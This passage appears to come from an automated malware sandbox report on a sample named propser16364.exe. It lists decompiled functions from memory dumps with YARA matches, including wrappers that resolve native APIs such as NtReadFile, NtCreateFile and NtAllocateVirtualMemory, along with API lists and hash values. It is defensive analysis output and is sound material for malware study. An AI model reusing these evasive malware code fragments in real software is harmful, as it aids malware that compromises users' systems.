                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                                              • Instruction ID: 5185fe82c3568d3c8632712b5ff5a6750f12376067ae41ef0f6fc1d41a32777d
                                                              • Opcode Fuzzy Hash: c3ebc3f9998ac015d8c7df4fd8e4914833f251e822556357c2f70f84276a4d27
                                                              • Instruction Fuzzy Hash: D6E0BFF4A00209BFEB109F64ED09F7B77ACEB04644F508425BE51F2150D77899658A78
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405C07, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405C07(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                              0x00405c08
                                                              0x00405c12
                                                              0x00405c14
                                                              0x00405c1b
                                                              0x00405c23
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405c23
                                                              0x00405c25
                                                              0x00405c2a

                                                              APIs
                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402F5D,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\propser16364.exe,C:\Users\user\AppData\Roaming\propser16364.exe,80000000,00000003), ref: 00405C0D
                                                              • CharPrevA.USER32(80000000,00000000), ref: 00405C1B
                                                              Strings
                                                              • C:\Users\user\AppData\Roaming, xrefs: 00405C07
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\AppData\Roaming
                                                              • API String ID: 2709904686-2707566632
                                                              • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                              • Instruction ID: 741041d8a9fca0cd730fa631f59021aaf6e5318b071c559ffeb457c432b97b3b
                                                              • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                              • Instruction Fuzzy Hash: 09D0C77241DA706EF70363149D05B9F6A48DF57700F1A44A6E581A6191C77C4C524BFD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405D26, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405D26(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                              0x00405d36
                                                              0x00405d38
                                                              0x00405d3b
                                                              0x00405d67
                                                              0x00405d40
                                                              0x00405d49
                                                              0x00405d4e
                                                              0x00405d59
                                                              0x00405d5c
                                                              0x00405d78
                                                              0x00405d5e
                                                              0x00405d65
                                                              0x00000000
                                                              0x00405d65
                                                              0x00405d71
                                                              0x00405d75
                                                              0x00405d75
                                                              0x00405d6f
                                                              0x00000000

                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D4E
                                                              • CharNextA.USER32(00000000), ref: 00405D5F
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                              • Instruction ID: 00b114ba7cac9785f06d25343f2ff2c8ce87c9cf7580b170eb884579fc1bcc0a
                                                              • Opcode Fuzzy Hash: 2d92a05f35b020f23b5ffca9bb537fc612b2b61cfc11000e71e0c2b875cbb8c3
                                                              • Instruction Fuzzy Hash: 45F0F631100818BFCB02DFA4CD04D9EBBA8EF55354B2580BBE840FB210D634DE01AFA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Analysis Process: propser16364.exe PID: 2860 Parent PID: 2960 propser16364.exeCOMMON

                                                              Executed Functions

                                                              Function 00419E0A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 37%
                                                              			E00419E0A(void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t19;
				void* _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t14 = _a4;
				_t32 = _a4 + 0xc48;
				E0041A960(_t30, _t14, _t32,  *((intOrPtr*)(_t14 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t19 =  *((intOrPtr*)( *_t32))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t31, _t34); // executed
				return _t19;
			}








                                                              0x00419e13
                                                              0x00419e1f
                                                              0x00419e27
                                                              0x00419e32
                                                              0x00419e4d
                                                              0x00419e55
                                                              0x00419e59

                                                              APIs
                                                              • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: BMA$BMA
                                                              • API String ID: 2738559852-2163208940
                                                              • Opcode ID: a6863e25200f53c60070e765f01ad4f980fbdbc4257bcff31af652f6e49a7f81
                                                              • Instruction ID: 55e0dc4dbdd9a101280cb1c0d95cab36a01ff2a436e8508b2ee07f80df5e6118
                                                              • Opcode Fuzzy Hash: a6863e25200f53c60070e765f01ad4f980fbdbc4257bcff31af652f6e49a7f81
                                                              • Instruction Fuzzy Hash: 08F0F9B6200109AFDB14CF99CC80DEB77A9EF8C714F058648BA5D97251C630E951CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 37%
                                                              			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                              0x00419e13
                                                              0x00419e1f
                                                              0x00419e27
                                                              0x00419e32
                                                              0x00419e4d
                                                              0x00419e55
                                                              0x00419e59

                                                              APIs
                                                              • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID: BMA$BMA
                                                              • API String ID: 2738559852-2163208940
                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                              • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                              • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                              • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                              • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                              0x00419d6f
                                                              0x00419d77
                                                              0x00419dad
                                                              0x00419db1

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                              0x00419f4f
                                                              0x00419f57
                                                              0x00419f79
                                                              0x00419f7d

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00419F3F, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00419F3F(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				intOrPtr _v117;
				long _t15;
				void* _t22;

				_v117 = ss;
				_t11 = _a4;
				_t4 = _t11 + 0xc60; // 0xca0
				E0041A960(_t22, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t15;
			}






                                                              0x00419f3f
                                                              0x00419f43
                                                              0x00419f4f
                                                              0x00419f57
                                                              0x00419f79
                                                              0x00419f7d

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 653b1de3e46fa1d33160a2fe461d54111b0e5512201421b9b6950d6fcaf1546a
                                                              • Instruction ID: 78c0e126786f81b85df2854a63e2de95e847ba9349cdcb0bccd2149f59c72d1d
                                                              • Opcode Fuzzy Hash: 653b1de3e46fa1d33160a2fe461d54111b0e5512201421b9b6950d6fcaf1546a
                                                              • Instruction Fuzzy Hash: 74F015B2210218AFCB14DF99CC81EEB77A9EF88754F158649FE0DA7241C630E811CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00419E8A(intOrPtr __eax, intOrPtr _a4, void* _a12) {
				intOrPtr _t5;
				long _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t18;

				_t5 = __eax;
				asm("into");
				asm("aas");
				if(_t18 + __eax == 0) {
					_t5 = _a4;
					_t2 = _t5 + 0x10; // 0x300
					_t9 =  *_t2;
				}
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _t5, _t3, _t9, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}








                                                              0x00419e8a
                                                              0x00419e8a
                                                              0x00419e8b
                                                              0x00419e8e
                                                              0x00419e93
                                                              0x00419e96
                                                              0x00419e96
                                                              0x00419e96
                                                              0x00419e9f
                                                              0x00419ea7
                                                              0x00419eb5
                                                              0x00419eb9

                                                              APIs
                                                              • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 0f72a6a463ba30874523dd0513ced2e81c5ce8e39a583bb92d7dde8a870dec48
                                                              • Instruction ID: 4a19b488b8fad79b540f36b25ef9eaaf78728982d5b9341d841228217dd0aa27
                                                              • Opcode Fuzzy Hash: 0f72a6a463ba30874523dd0513ced2e81c5ce8e39a583bb92d7dde8a870dec48
                                                              • Instruction Fuzzy Hash: 55E08CB5200314BBD710EBA8CC86EE77BA8EF44760F158599BA0CAB242D530FA5186E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00419E90(intOrPtr _a4, void* _a8) {
				intOrPtr _t5;
				long _t8;
				intOrPtr _t9;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t9 =  *_t2;
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A960(_t11, _t5, _t3, _t9, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}







                                                              0x00419e93
                                                              0x00419e96
                                                              0x00419e96
                                                              0x00419e9f
                                                              0x00419ea7
                                                              0x00419eb5
                                                              0x00419eb9

                                                              APIs
                                                              • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 008300C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00830048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                              • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                              • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                              • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00830078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0082FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
